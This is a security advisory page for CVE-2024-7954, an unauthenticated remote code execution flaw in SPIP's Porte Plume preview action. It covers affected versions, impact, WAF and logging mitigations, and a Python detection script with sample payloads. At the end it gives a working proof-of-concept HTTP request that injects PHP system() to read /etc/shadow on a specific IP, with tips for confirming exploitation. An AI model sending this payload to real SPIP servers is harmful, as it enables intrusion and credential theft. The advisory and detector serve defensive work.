Vulnerable Version
SPIP before 4.3.0-alpha2, 4.2.13, and 4.1.16
Fixed Version
SPIP 4.3.0-alpha2
SPIP 4.2.13
SPIP 4.1.16
Base Score
9.8 Critical
CVE-2024-7954 Vendor Description:-
SPIP (Système de Publication pour l’Internet) is an open-source content management system (CMS) designed for the creation, management, and publication of web content. Initially developed for collaborative publishing, SPIP is widely used by media organizations, educational institutions, and community-driven websites due to its flexibility, ease of use, and strong focus on multi-user content editing. Written in PHP, SPIP features a structured templating system, a robust user permission model, and support for multilingual content, making it a preferred choice for dynamic web platforms.
Vulnerability Description:-
CVE-2024-7954 is a critical Remote Code Execution (RCE) vulnerability in the Porte Plume plugin, the editing toolbar that ships with the SPIP core distribution (plugins-dist), so a default SPIP install exposes it without any extra plugin being installed. It affects SPIP versions before 4.3.0-alpha2, 4.2.13, and 4.1.16 and lets an unauthenticated remote attacker execute arbitrary PHP code with a single crafted HTTP request; no account, session, or anti-CSRF token is required.
The flaw is insufficient input sanitization in the porte_plume_previsu action, which takes the user-supplied data parameter and renders it as a content preview. A PHP open tag embedded inside SPIP's link shortcut syntax ([->URL...]) is not neutralised on the preview path and is executed server-side, so the attacker's PHP, and any shell command it invokes, runs with the privileges of the PHP/web-server account hosting SPIP (typically www-data rather than a dedicated SPIP user). From there the attacker can read the application's configuration and database credentials, modify content, and pivot into the network.
Impact:-
- Full system compromise – Attackers can execute arbitrary commands, manipulate files, and deploy further exploits.
- Data exfiltration – Sensitive data, including user credentials, database content, and system files, can be accessed or stolen.
- Website defacement – Malicious actors may modify website content, inject malicious scripts, or disrupt operations.
- Privilege escalation & lateral movement – An attacker with control over the server can attempt to escalate privileges or move deeper into the network, increasing the attack scope.
- Service disruption & ransomware deployment – Exploiting this vulnerability could lead to denial-of-service (DoS) attacks or the deployment of ransomware, crippling business operations.
Mitigations:-
Patch and Update:
- Upgrade to the fixed release of the branch you run: 4.1.16 for 4.1.x, 4.2.13 for 4.2.x, or 4.3.0-alpha2 for the 4.3 prerelease. Porte Plume is distributed with SPIP core, so updating SPIP updates the plugin; do not wait for a separate plugin update.
Web Application Firewall (WAF):
- Block or challenge requests that carry action=porte_plume_previsu together with a PHP open tag (<?php or <?=) in the data parameter. The payload travels URL-encoded in the POST body, so the rule must inspect and decode request bodies, not only the URL.
Access Controls & Least Privilege:
- Run PHP for SPIP under a dedicated low-privilege account with a read-only document root, so code executed through this flaw cannot overwrite site files or read beyond the application's own configuration.
- The action is reachable without authentication; until the upgrade is applied, restrict action=porte_plume_previsu at the reverse proxy to the networks your editors use, or deny it outright.
Log Monitoring & Anomaly Detection:
- Search web server access logs for requests to action=porte_plume_previsu from unexpected sources; the access log does not contain POST bodies, so enable body logging at the proxy or WAF if you need to see payloads.
- Alert on the PHP worker spawning shells or other unexpected child processes (sh, bash, curl, wget) and on new files appearing under the web root, and feed these events to your IDS/EDR.
Disable Unused Features:
- If the Porte Plume editing toolbar is not needed, deactivate the plugin so the action is no longer served. Because it is part of the core distribution this is a stopgap, not a substitute for upgrading.
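The WAF and log-monitoring points above come down to one signature: a porte_plume_previsu request whose decoded parameters contain a PHP open tag. The following is an added example, not code from the original page or from the SPIP project, that applies that signature to request records (request target plus body) of the kind a reverse proxy or WAF with body logging can emit. It decodes repeatedly so double URL-encoding does not hide the tag, and it looks for the action name in both the query string and the body, on the assumption that SPIP accepts the action parameter either way. The four sample records are constructed, not captured traffic.

```python
"""Request-level detection for CVE-2024-7954 exploitation attempts.

Added example; not from the original page or the SPIP project. Works on
(request_target, body) pairs such as a proxy or WAF with body logging
could supply. Sample records below are constructed.
"""
import re
import urllib.parse

PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)   # <?php or <?=
TARGET_ACTION = "porte_plume_previsu"


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode up to `rounds` times so double encoding cannot hide the tag."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_exploit_attempt(target: str, body: str) -> bool:
    """True if the request invokes porte_plume_previsu with a PHP open tag in it.

    The action is looked up with a proper form parser in both the query
    string and the body (assumption: SPIP reads it from either); the PHP
    tag is searched in the fully decoded query and body.
    """
    query = target.split("?", 1)[1] if "?" in target else ""
    actions = (urllib.parse.parse_qs(query).get("action", [])
               + urllib.parse.parse_qs(body).get("action", []))
    if TARGET_ACTION not in actions:
        return False
    return PHP_TAG_RE.search(fully_decode(query + "&" + body)) is not None


def scan(records) -> list[int]:
    """Return the indices of records that match the exploitation signature."""
    return [i for i, (target, body) in enumerate(records) if is_exploit_attempt(target, body)]


SAMPLE_REQUESTS = [  # constructed samples
    # 0: the page's PoC shape, URL-encoded the way a client would send it
    ("/index.php?action=porte_plume_previsu",
     "data=AA_%5B-%3EURL%3C%3Fphp+system%28%27id%27%29%3B+%3F%3E%5D_BB"),
    # 1: legitimate preview of ordinary SPIP markup
    ("/index.php?action=porte_plume_previsu", "data=%7B%7Bbold%7D%7D+text"),
    # 2: action moved into the body and the PHP tag double-encoded
    ("/spip.php", "action=porte_plume_previsu&data=%253C%253Fphp+echo+1%253B+%253F%253E"),
    # 3: PHP tag sent to a different action: not this vulnerability
    ("/index.php?action=autre", "data=%3C%3Fphp+echo+1%3B+%3F%3E"),
]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print(f"record {i}: CVE-2024-7954 exploitation attempt: {SAMPLE_REQUESTS[i][0]}")
```

Keying the rule on the action name keeps the false-positive rate low (a PHP tag in an unrelated form field is record 3 and is not flagged), while decoding before matching is what catches record 2; a body-blind or decode-blind WAF rule misses both the PoC and its encoded variants.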
POC:-
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: 8.221.138.111:8457
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

data=AA_[->URL<?php system('cat /etc/shadow'); ?>]_BB
Note: the empty line between the headers and the body is mandatory, and when the body is sent URL-encoded, as the declared Content-Type requires, Content-Length must be recomputed to match the encoded bytes. /etc/shadow is normally not readable by the web server account, so a first test such as id or cat /etc/passwd gives a clearer verdict: on an affected install the command output appears in the returned preview HTML, whereas an unaffected install returns the text without it.

POC Video:-
